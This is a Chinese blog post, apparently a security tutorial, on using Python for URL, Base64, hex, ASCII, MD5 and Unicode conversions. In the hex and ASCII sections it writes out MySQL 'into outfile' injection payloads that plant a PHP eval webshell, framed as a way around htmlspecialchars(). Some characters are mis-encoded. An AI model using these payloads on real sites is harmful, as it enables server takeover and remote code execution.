前言

記得剛?cè)腴T(mén)那個(gè)時(shí)候，自己處理編碼轉(zhuǎn)換問(wèn)題往往是“百度：url解碼、base64加密、hex……”，或者是使用一款叫做“小葵多功能轉(zhuǎn)換工具”的軟件，再后來(lái)直接上Burpsuite的decoder功能，感覺(jué)用的還挺好的。不過(guò)，也遇到些問(wèn)題：在線轉(zhuǎn)換效率低(搜索占去了2/3的時(shí)間)、兩款工具存在一些小問(wèn)題，比如burp中涉及中文往往顯示亂碼。

直到使用python來(lái)作為日常編碼轉(zhuǎn)換工具……

開(kāi)啟py轉(zhuǎn)換之旅

url編碼

url編碼是一種瀏覽器用來(lái)打包表單輸入的格式.可謂是一名作為web人員最熟悉的一種編碼方式了。

>>> from urllib import *
>>> quote("union select null,null,null")
'union%20select%20null%2Cnull%2Cnull'
>>> unquote("union%20select%20null%2Cnull%2Cnull")
'union select null,null,null'
>>> urlencode({'x':'2333','y':'666'})
'y=666&x=2333'

Base64

Base64常常用作網(wǎng)頁(yè)表單和HTTP傳輸?shù)囊恍﹨?shù)，也常用于郵件協(xié)議傳輸用戶信息等。

>>> import base64
>>> base64.b64encode("admin")
'YWRtaW4='
>>> base64.b64decode('YWRtaW4=')
'admin'

記得有次ctf比賽中考到了base32解密，一般網(wǎng)站不提供在線解密，一時(shí)之間貌似沒(méi)有辦法繼續(xù)下去。不過(guò)如果你使用python的話會(huì)像上邊解密base64一樣簡(jiǎn)單，只需要將函數(shù)改變下：

>>> import base64
>>> base64.b32encode('jjjjj')
'NJVGU2TK'
>>> base64.b32decode('NJVGU2TK')
'jjjjj'

Hex

十六進(jìn)制編碼也是web application中常見(jiàn)的一種編碼方案。作為一名web安全人員，我們心知肚明的是，MySQL注入可以使用hex繞過(guò)htmlspecialchars()函數(shù)從而寫(xiě)入webshell。

比如：

select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'

下面是python實(shí)現(xiàn)hex加解密的方法：

>>> '<?php @eval($_POST[a]); ?>'.encode('hex')
'3c3f70687020406576616c28245f504f53545b615d293b203f3e'
>>>
>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')
<?php @eval($_POST[a]); ?>
>>>

ASCii

MySQL中的char()函數(shù)則是轉(zhuǎn)換ascii碼的，正因如此，也可以使用這個(gè)特性來(lái)繞過(guò)htmlspecialchars()函數(shù)。

比如：

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'

使用python將字符串轉(zhuǎn)換ascii很簡(jiǎn)單，但是逆轉(zhuǎn)換的話需要需要點(diǎn)小操作：

>>> map(ord, "<?php phpinfo() ?>")
[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]

>>> print chr(112)
p

>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]
>>> print ''.join(map(chr,l)) #感謝pcat表哥指出的方法
<?php phpinfo() ?>

Md5

md5在web安全界可以說(shuō)是人盡皆知了，以他的不可逆性，大多數(shù)網(wǎng)站存儲(chǔ)用戶密碼等關(guān)鍵數(shù)據(jù)時(shí)常常使用md5加密。有的時(shí)候我們提交payload需要md5加密，這個(gè)時(shí)候用下面的方法就可以輕松實(shí)現(xiàn)。當(dāng)然解密的話推薦去cmd5。

>>> from hashlib import md5
>>> m = md5()
>>> m.update('this is a secret')
>>> m.hexdigest()
'7dbbcee180ba4d456e4aa1cfbdad9c7b'

>>> m.hexdigest()[8:-8]
'80ba4d456e4aa1cf'
>>>

Unicode轉(zhuǎn)中文

unicode轉(zhuǎn)換中文，很多情況下都能遇到。尤其是在做滲透測(cè)試的時(shí)候。用burp的話會(huì)存在中文亂碼的問(wèn)題，在python下實(shí)現(xiàn)非常簡(jiǎn)單。

>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"
你需要重新登陸

總結(jié)

python實(shí)際上在實(shí)際使用中非常方便，編碼轉(zhuǎn)換只是其中一個(gè)例子。文中提到的編碼轉(zhuǎn)換皆為筆者日常積累，如果有沒(méi)有涉及到的地方，歡迎評(píng)論補(bǔ)充。好了，以上就是這篇文章的全部?jī)?nèi)容了，希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作能帶來(lái)一定的幫助，如果有疑問(wèn)大家可以留言交流，謝謝大家對(duì)腳本之家的支持。

最新評(píng)論